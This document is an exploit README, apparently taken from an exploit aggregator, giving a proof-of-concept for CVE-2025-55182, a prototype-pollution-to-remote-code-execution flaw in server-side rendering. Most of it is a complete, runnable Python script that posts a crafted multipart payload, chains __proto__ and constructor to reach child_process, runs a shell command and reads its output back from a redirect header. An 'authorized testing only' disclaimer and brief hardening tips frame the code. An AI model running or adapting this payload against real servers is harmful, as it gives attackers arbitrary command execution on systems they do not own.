Share
## https://sploitus.com/exploit?id=22C6452A-F4D3-54B3-B016-2B265DDA20D5
# CVE-2025-55182 Proof-of-Concept

This repository contains a Proof-of-Concept (PoC) for **CVE-2025-55182**, a vulnerability involving **Prototype Pollution leading to Remote Code Execution (RCE)** in certain server‑side rendering implementations.

> ⚠️ **Warning:** This PoC is strictly for educational, research, and authorized security testing on personal or controlled environments. Unauthorized use on systems without permission is illegal.

---

## Vulnerability Overview
The vulnerability occurs when unvalidated user input is injected into internal JavaScript object structures (Prototype Pollution). When combined with specific execution flows, this can lead to **arbitrary code execution**. 

In this PoC, chained properties such as `__proto__` and `constructor` are used to escalate the pollution into an execution context.

---

## Proof-of-Concept
Below is the `exploit.py` showcasing how the vulnerability can be exploited:

```python
import requests
import json

url = "http://localhost:3000"

headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
    "Next-Action": "x",
}

prefix = "var res=process.mainModule.require('child_process').execSync('id').toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});"

files = {
    "0": (
        None,
        json.dumps({
            "then": "$1:__proto__:then",
            "status": "resolved_model",
            "reason": -1,
            "value": '{"then":"$B1337"}',
            "_response": {
                "_prefix": prefix,
                "_formData": {"get": "$1:constructor:constructor"}
            }
        }),
        "application/json",
    ),
    "1": (None, "\"$@0\""),
}

response = requests.post(url, headers=headers, files=files)

print("Headers:", response.headers.get('x-action-redirect'))
```

---

## How to Run
```bash
python3 exploit.py
```
Ensure you run this against a **local or development environment only**.

---

## Patch Status
If this vulnerability affects a real‑world project, check for and install the latest security patches released by the maintainers.

---

## Security Recommendations
- Regularly run npm audit and apply npm audit fix to keep dependencies secure
- Validate and sanitize all user input
- Prevent access to internal JavaScript object prototypes
- Use SSR sandbox isolation where possible
- Restrict or disable `child_process` execution in production

---

## License
MIT License